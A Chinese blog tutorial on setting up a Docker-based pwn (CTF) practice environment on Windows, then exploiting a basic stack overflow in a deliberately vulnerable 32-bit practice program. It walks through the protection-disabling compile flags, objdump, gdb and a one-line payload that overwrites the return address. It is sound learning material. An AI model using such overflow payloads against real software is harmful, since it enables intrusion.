基于Windows Docker desktop搭建pwn环境

已于 2024-07-29 12:47:19 修改
阅读量144 收藏 3
点赞数 1
分类专栏: pwn 文章标签: docker pwn
于 2024-07-29 12:17:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lifeng_dc/article/details/140764675
版权

安装虚拟机很重,占空间,影响速度。
今天试了下用Windows下的Docker搭建pwn做题环境,搭配MobaXterm真的很好!

一、Windows下安装Docker desktop

网上参考文章很多,不赘述。
说明:去https://www.docker.com/products/docker-desktop下载最新版本的安装包,国内可能下载不了,你懂的,也有博主分享了baiduyun,安装过程非常简单,不用手动调整windows组件(WSL v2)。
在这里插入图片描述

安装完成需要配置源:
国内从 DockerHub 拉取镜像有时会遇到困难,此时可以配置镜像加速器。
阿里云镜像获取地址:https://cr.console.aliyun.com/cn-hangzhou/instances/mirrors
在这里插入图片描述

然后把wsl的虚拟机地址移到其他盘(默认C盘):
在这里插入图片描述

二、从Dockerfile建立镜像,并运行容器

参考:https://ctf-wiki.org/pwn/linux/user-mode/environment/

新建Dockerfile文件

在这里插入图片描述

执行build生成镜像

docker build -t pwn_ubuntu22 .

运行容器

docker run -d -p 25000:22 --name=pwn22 --restart unless-stopped -v home_ubuntu22:/home/l11 pwn_ubuntu22

MobaXterm连接容器

在这里插入图片描述

三、写C代码、编译、执行

具体代码略,参考:https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/stackoverflow-basic/
注意编译时要加-no-pie参数:

gcc -m32 -fno-stack-protector stack_example.c -no-pie -o stack_example

执行,观察有栈溢出漏洞:
在这里插入图片描述

四、反汇编

目标:找到合适的调试断点及控制程序返回点

objdump -M intel -d stack_example

找到函数:vulnerable
找到返回前的地址:0x080491e5,在这里下断点调试
在这里插入图片描述
找到suscess函数地址:0x08049186
在这里插入图片描述

五、栈溢出调试(原始方法,暂时没用pwntools)

准备输入文本

脚本:

#s0.py
buffer = ""

for i in range(0x41,0x5b): #AAAA-ZZZZ
  buffer += chr(i)*4

print(buffer)

生成文件:

python s0.py > s0.txt

在这里插入图片描述

gdb调试

下断点,导入文本:

gdb stack_example
b *0x080491e5
start
r < s0.txt

在这里插入图片描述
在这里插入图片描述
算出需要填入的字符为0x18个(A-F:6个字母,4*6=24=0x18)
在这里插入图片描述
按c回车继续执行
在这里插入图片描述

六、最终脚本

再次生成测试文本:
上面算出需要填充0x18个字符,覆盖ebp,再写入返回地址

python2 -c 'print("A" * 0x18 + "\x86\x91\x04\x08")' > s1.txt

说明:“\x86\x91\x04\x08” 为success地址:0x08049186的小端形式,反过来的。
在这里插入图片描述
再次调试:
在这里插入图片描述
打一下试试:

python2 -c 'print("A" * 0x18 + "\x86\x91\x04\x08")' | ./stack_example

在这里插入图片描述
pwn环境配置及最简单的pwn题测试成功了!

lvx++
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
docker搭建pwn环境
yusakul的博客
11-18 2903
windowsdocker搭建pwn环境
docker快速搭建部署mqtt
weixin_45982841的博客
04-20 1329
MQTT(Message Queuing Telemetry Transport,消息队列遥测传输协议),是一种基于发布/订阅(publish/subscribe)模式的“轻量级”通讯协议,该协议构建于TCP/IP协议上,由IBM在1999年发布。人生物语:该发生的总会发生,不管你是否为此焦虑,我们总该相信点未来。
docker快速搭建http服务器
一个到老才知道分享的人的博客
11-05 7532
一、容器创建 docker run -d --restart=always -p 8080:8080 --name oa_http -v /home/hillstone/apps/oa/volume/myfile:/usr/local/apache2/myfile -v /home/hillstone/apps/oa_http/httpd.conf:/usr/local/apache2/conf/httpd.conf -v /home/hillstone/apps/oa_http/mime.types:
pwndocker环境搭建-半永久化
没有网络安全,就没有国家安全
06-20 699
pwndocker环境搭建-半永久化。
windows docker desktop 客户端
03-24
Docker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的镜像中,然后发布到任何流行的 Linux或Windows操作系统的机器上,也可以实现虚拟化。容器是完全使用沙箱机制,相互之间不会有...
WindowsDocker Desktop
04-06
WindowsDocker Desktop
Docker Desktop for Windows 10 (Docker Desktop Installer.exe)
06-19
资源名称: Docker Desktop for Windows 10 (Docker Desktop Installer.exe) 概述: Docker Desktop for Windows 10 是一个官方提供的强大工具,它允许用户在Windows 10操作系统上轻松运行Docker容器化应用。Docker ...
基于docker的caffe环境搭建方法
09-30
主要介绍了基于docker的caffe环境搭建方法,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
docker desktop安装包
01-08
Docker Desktop是一种开源的应用容器引擎,它允许开发者将他们的应用及依赖项打包到一个可移植的容器中,然后发布到任何流行的Linux机器上,甚至可以实现虚拟化。这种技术对于简化配置,节省项目环境部署时间以及...
docker -v 到底和那个一样?type=volume还是type=bind的解释
qq_15821487的博客
07-25 296
【代码】docker -v 到底和那个一样?type=volume还是type=bind的解释。
Docker consul的容器服务更新与发现
weixin_44112402的博客
07-25 824
consul是google开源的一个使用go语言开发的服务管理软件。支持多数据中心、分布式高可用的、服务发现和配置共享。采用Raft算法,用来保证服务的高可用。内置了服务注册与发现框架、分布一致性协议实现、健康检查、Key/Value存储、多数据中心方案,不再需要依赖其他工具(比如ZooKeeper等)。服务部署简单,只有一个可运行的二进制的包。每个节点都需要运行agent,他有两种运行模式server 和 client。
一种docker start放回Error response from daemon: task xxx错误的解决方式
QZXSY1的博客
07-25 172
执行重启命令后,发现docker中有的应用无法启动,并显示出Exit(255)的错误提示。重新执行后发现返回错误。
Docker安全管理与HTTPS协议
2401_83786744的博客
07-25 727
openssl x509 -req -days 3650 -in server.csr -CA ca.pem -CAkey ca.key -CAcreateserial -out server.pem #基于CA私钥、CA证书和服务端证书自签名请求文件签发服务端证书文件。尽量以资源限制的方式运行容器 -m --memory-swap --cpu-quota --cpuset-cpus --device-write-bps。
Docker 深度解析:从入门到精通
2301_77695569的博客
07-22 1216
Docker 是一个开源的应用容器引擎,它允许开发者将应用及其依赖环境打包到一个可移植的容器中。Docker 使用 Linux 容器(LXC)技术,但与 LXC 相比,Docker 提供了更易用的接口和更高效的资源利用。EXPOSE 80"]Docker 作为容器化技术的代表,极大地简化了应用的部署和管理。通过本文的介绍,希望你能对 Docker 有一个全面的了解,并能够开始使用 Docker 来管理和部署你的应用。Docker 的世界非常广阔,还有很多高级功能等待你去探索和使用。
docker搭建python3的私有源--devpi
tingting0119的博客
07-25 202
搭建私有pip仓库,供局域网使用
Docker 安装指南
小林的博客
07-25 752
配置好 YUM 源后,就可以安装 Docker 了。由于国内网络环境的限制,直接从 Docker 官方仓库拉取镜像可能会比较慢。Docker 是一个开源的容器化平台,能够让开发者打包应用及其依赖项到一个轻量级的、可移植的容器中。:此命令会移除旧的 Docker 版本及其相关组件,但不会删除你的 Docker 镜像、容器、卷或网络。为了从官方仓库或镜像仓库安装 Docker,需要先配置 Docker 的 YUM 源。通过以上步骤,你应该能够顺利安装和配置 Docker,并享受快速的镜像下载和管理体验。
docker配置上网代理获取镜像
beck_li的博客
07-25 516
一、添docker子配置档设置 1 1、 创建目录 1 2、 创建http-proxy.conf文件,增加以下内容 1 3、 Daemon重新reload 并重启docker 1 4、 检查变量是否加载 1 5、 取消代理 1 二、 修改docker.service配置设置 1 1、 编辑docker.service 1 2、 重启docker.service服务 1 3、 最后测试docker是否可以联网 2
【全面讲解下Docker in Docker的原理与实践】
最新发布
2301_81357485的博客
07-25 794
🦛Docker in Docker(通常缩写为 DinD)是在Docker容器内运行Docker它自己的实例的技术。这种方法经常用于CI/CD流程,以使得容器内部可以构建和运行新的Docker镜像和容器。然而,Docker in Docker的使用因为其复杂性和安全隐患而需要慎重。
Windowsdocker desktop 搭建jenkins的自动化测试
04-28
好的,我可以为您提供一些关于在Windows上使用Docker Desktop搭建Jenkins自动化测试的指导。 步骤如下: 1. 首先,确保您的Windows系统已经安装了Docker Desktop。如果您还没有安装,请先从Docker官网下载并安装Docker Desktop。 2. 接下来,您需要在Docker Desktop中启动Jenkins容器。可以使用以下命令: ``` docker run -p 8080:8080 -p 50000:50000 jenkins/jenkins:lts ``` 这将会从Docker Hub拉取Jenkins的最新版本,并在本地启动一个Jenkins容器,同时将Jenkins的8080端口映射到本地的8080端口。 3. 在浏览器中打开http://localhost:8080,您将看到Jenkins的欢迎页面。按照提示进行安装和配置。 4. 在Jenkins中安装必要的插件,并配置自动化测试任务。您可以使用Jenkins提供的Pipeline语法来定义自己的自动化测试任务脚本。 5. 最后,您可以在Docker中运行自己的测试镜像,以确保您的测试在一个可重复的环境中运行,并且可以随时在不同的环境中运行。 希望这些步骤可以帮助您在Windows上使用Docker Desktop搭建Jenkins自动化测试。如果您还有任何问题,请随时向我提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值